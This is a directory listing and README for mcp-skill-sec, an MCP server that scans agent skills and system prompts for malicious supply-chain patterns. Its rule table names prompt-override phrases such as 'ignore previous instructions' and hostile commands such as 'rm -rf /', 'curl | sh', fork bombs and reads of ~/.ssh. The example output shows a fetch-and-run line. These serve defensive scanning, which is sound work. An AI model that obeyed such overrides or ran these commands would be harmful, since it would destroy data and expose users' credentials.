Skip to main content
ClaudeWave

MCP server auditing agent skills/system prompts against 8 malicious-skill supply-chain patterns (deterministic, no-LLM, MIT).

MCP ServersOfficial Registry0 stars0 forksPythonUpdated today
ClaudeWave Trust Score
62/100
· OK
Passed
  • Actively maintained (<30d)
  • Clear description
  • Topics declared
  • Documented (README)
Flags
  • !No standard license detected
  • !Install pipes a remote script into a shell (curl | sh)
Last scanned: 8/28/2026
Install in Claude Code / Claude Desktop
Method: pip / Python · mcp
Claude Code CLI
claude mcp add mcp-skill-sec -- python -m mcp
claude_desktop_config.json (Claude Desktop)
{
  "mcpServers": {
    "mcp-skill-sec": {
      "command": "python",
      "args": ["-m", "mcp"]
    }
  }
}
1. Run the command above in your terminal (Claude Code), or paste the JSON config into claude_desktop_config.json (Claude Desktop).
2. Replace any <placeholder> values with your API keys or paths.
3. Restart Claude. The MCP server and its tools appear automatically.
💡 Install first: pip install mcp
Use cases

MCP Servers overview

# mcp-skill-sec

A Model Context Protocol (MCP) server that audits any agent skill, system
prompt, or downloaded file collection against the **8 malicious-skill
supply-chain patterns**.

Deterministic, no LLM, no network calls — a self-hostable pre-install scanner
that works with Claude Code, Cursor, Copilot, OpenClaw, Codex CLI, and any
MCP-compatible agent.

## What it scans for (rules R1–R8)

| Rule | Pattern |
|------|---------|
| R1 | Prompt injection / instruction hijack (`ignore previous instructions`, secrecy directives, identity overrides) |
| R2 | Data exfiltration intent (send/post/email contents to a URL, log theft) |
| R3 | Hardcoded secrets / credentials (API keys, PATs, private keys, connection strings) |
| R4 | Dangerous commands (`rm -rf /`, `curl \| sh`, fork bombs, raw device writes) |
| R5 | Obfuscation / hidden behavior (base64-exec, eval/exec, zero-width chars) |
| R6 | Untrusted external fetches (fetch-and-run, non-PyPI installs) |
| R7 | Credential access (reading `~/.ssh`, `.aws/credentials`, `.env`) |
| R8 | Privilege escalation (`sudo -s`, setuid, adding to sudo group) |

Each finding carries a `severity` (critical/high/medium/low), a line number,
and the matching evidence line. The overall verdict is **PASS** only when
there are no critical/high findings and every medium finding is benign.

## Tools

- `audit_text(text, filename)` — audit a string (a skill you were pasted, a
  system prompt you didn't write).
- `audit_skill_file(path)` — audit a `SKILL.md` / `AGENTS.md` / `CLAUDE.md`
  on disk, line-numbered evidence.
- `audit_directory(path, pattern)` — audit a whole downloaded skills
  collection; returns per-file verdicts + a summary.
- `rule_list()` — dump the rule catalog.

## Install & run

**One command (recommended) — installs from the repo, no PyPI token needed:**

```bash
uv tool install git+https://github.com/sudo-ai-git/mcp-skill-sec
# then register with your agent:
mcp-skill-sec                       # run stdio server
mcp-skill-sec --http --port 8137    # or Streamable HTTP for remote use
```

Or with `pipx`: `pipx install git+https://github.com/sudo-ai-git/mcp-skill-sec`

**Direct from source (fallback):**

```bash
pip install mcp
python3 mcp_server.py               # run stdio
mcp install mcp_server.py --name skill-sec   # register with Claude Desktop
```

### Claude Desktop / agent config

```json
{
  "mcpServers": {
    "skill-sec": {
      "command": "mcp-skill-sec",
      "args": []
    }
  }
}
```
   
## Example

```text
skill-sec: /tmp/downloaded-skill/SKILL.md
  verdict : FLAG
  counts  : critical 1, high 2, medium 1, low 0
  R3 [critical] line 11: api_key = "sk-live-…"
  R3 [high]     line 14: password = "hunter2"
  R4 [critical] line 22: curl https://x/y.sh | sh
  action : remove the literal secrets, drop the fetch-and-run, re-audit
```

## Part of a family

This is one of three **deterministic, no-LLM** agent-trust MCP servers by `sudo-ai-git`:

- [`mcp-skill-sec`](https://github.com/sudo-ai-git/mcp-skill-sec) — pre-install skill/security audit (this repo)
- [`mcp-verify-claim`](https://github.com/sudo-ai-git/mcp-verify-claim) — evidence-gated, honestly-tiered claim reporting
- [`mcp-benchmark-hygiene`](https://github.com/sudo-ai-git/mcp-benchmark-hygiene) — pytest config-leakage / eval-honesty detection

**Also in the family** (a free CLI, not an MCP server): [`harness-audit`](https://github.com/sudo-ai-git/harness-audit) — deterministic agent-eval / benchmark-grading hygiene audit that catches the same silent config-leakage mis-scoring class. Free lead-magnet; the same verification discipline, zero dependencies, auditable line-by-line.

## License & provenance

MIT. Written by `sudo-ai-git`. This is a standalone security/verification
tool; it encodes no proprietary method. It is the MCP expression of the
`skill-sec` agent skill (same rules, callable as a server instead of a skill).

## Official MCP Registry metadata

mcp-name: io.github.sudo-ai-git/mcp-skill-sec

## Hire a custom integration

Need this connected to *your* internal system (auth, logging, security-scan pass, hosted)? Open a [custom-build request](https://github.com/sudo-ai-git/agensi-builds/issues/new?template=custom-build-request.yml). MIT reference assets are free to use either way.

[![mcp-skill-sec MCP server](https://glama.ai/mcp/servers/sudo-ai-git/mcp-skill-sec/badges/score.svg)](https://glama.ai/mcp/servers/sudo-ai-git/mcp-skill-sec)
agentai-safetyauditclaudemcpmcp-serversecurity

What people ask about mcp-skill-sec

What is sudo-ai-git/mcp-skill-sec?

+

sudo-ai-git/mcp-skill-sec is mcp servers for the Claude AI ecosystem. MCP server auditing agent skills/system prompts against 8 malicious-skill supply-chain patterns (deterministic, no-LLM, MIT). It has 0 GitHub stars and its last recorded update is dated 2026-08-28.

How do I install mcp-skill-sec?

+

You can install mcp-skill-sec by cloning the repository (https://github.com/sudo-ai-git/mcp-skill-sec) or following the README instructions on GitHub. ClaudeWave also provides quick install blocks on this page.

Is sudo-ai-git/mcp-skill-sec safe to use?

+

Our security agent has analyzed sudo-ai-git/mcp-skill-sec and assigned a Trust Score of 62/100 (tier: OK). See the full breakdown of passed checks and flags on this page.

Who maintains sudo-ai-git/mcp-skill-sec?

+

sudo-ai-git/mcp-skill-sec is maintained by sudo-ai-git. The last recorded GitHub activity is dated 2026-08-28, with 0 open issues.

Are there alternatives to mcp-skill-sec?

+

Yes. On ClaudeWave you can browse similar mcp servers at /categories/mcp, sorted by popularity or recent activity.

Deploy mcp-skill-sec to your cloud

Ship this repo to production in minutes. Each platform spins up its own environment with editable env vars.

Maintain this repo? Add a badge to your README

Drop the badge into your GitHub README to show it's tracked on ClaudeWave. Each badge links back to this page and reflects the live Trust Score.

Featured on ClaudeWave: sudo-ai-git/mcp-skill-sec
[![Featured on ClaudeWave](https://claudewave.com/api/badge/sudo-ai-git-mcp-skill-sec)](https://claudewave.com/repo/sudo-ai-git-mcp-skill-sec)
<a href="https://claudewave.com/repo/sudo-ai-git-mcp-skill-sec"><img src="https://claudewave.com/api/badge/sudo-ai-git-mcp-skill-sec" alt="Featured on ClaudeWave: sudo-ai-git/mcp-skill-sec" width="320" height="64" /></a>

More MCP Servers

mcp-skill-sec alternatives